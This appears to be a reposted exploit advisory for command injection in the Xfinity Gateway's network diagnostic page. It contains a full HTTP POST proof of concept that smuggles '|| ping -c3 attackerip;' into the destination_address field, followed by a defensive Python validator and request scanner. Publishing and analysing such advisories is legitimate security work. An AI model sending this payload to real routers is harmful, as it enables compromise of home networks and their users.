Xfinity Gateway Remote Code Execution

2016.12.04
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php

The page located at /network_diagnostic_tools.php has a feature called "test connectivity", which is carried out through a POST request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.

PoC:

POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4

If you open up Wireshark and set the filter ip.dst==attackerip and icmp, you will see that the router issues 3 ICMP echo requests, proving successful command injection. This can be leveraged to completely compromise the device. This vulnerability is also particularly dangerous because there are no CSRF protections in this application, as demonstrated here: https://www.exploit-db.com/exploits/40853/
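The root cause described above is a destination_address value that reaches a shell unvalidated. The following is an added example (not code from the advisory or from the gateway firmware, whose handler is not shown) of the server-side check a fix would need: accept only a literal IP address or an RFC 1123 hostname, and apply the same check to captured request bodies to flag injection attempts. The sample bodies are constructed, with "attackerip" kept as a placeholder.

```python
"""Validate destination_address (the injection sink named in the advisory)
and flag request bodies whose value would never be a legitimate target."""
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_safe_destination(value: str) -> bool:
    """True only for an IP literal or a plain hostname.

    Spaces, quotes, ';', '|', '&', '$', backticks and every other shell
    metacharacter fail both checks, so they never reach the ping command.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6 literals
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def scan_request_bodies(bodies: list[str]) -> list[str]:
    """Return destination_address values that fail validation.

    Each entry is the raw application/x-www-form-urlencoded body of a POST
    to ajax_network_diagnostic_tools.php (e.g. from a proxy or access log).
    """
    flagged = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)  # decodes '+' and %XX
        for dest in params.get("destination_address", []):
            if not is_safe_destination(dest):
                flagged.append(dest)
    return flagged


# Constructed sample bodies: two legitimate requests and the advisory's
# injection pattern, URL-encoded as a browser would send it.
SAMPLE_BODIES = [
    "test_connectivity=true&destination_address=www.comcast.net&count1=4",
    "test_connectivity=true&destination_address=www.comcast.net+%7C%7C+ping+-c3+attackerip%3B+&count1=4",
    "test_connectivity=true&destination_address=10.0.0.1&count1=4",
]
```

The count1 parameter is user-controlled too and should be restricted to a small integer before it is interpolated into the ping command line.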


Copyright 2024, cxsecurity.com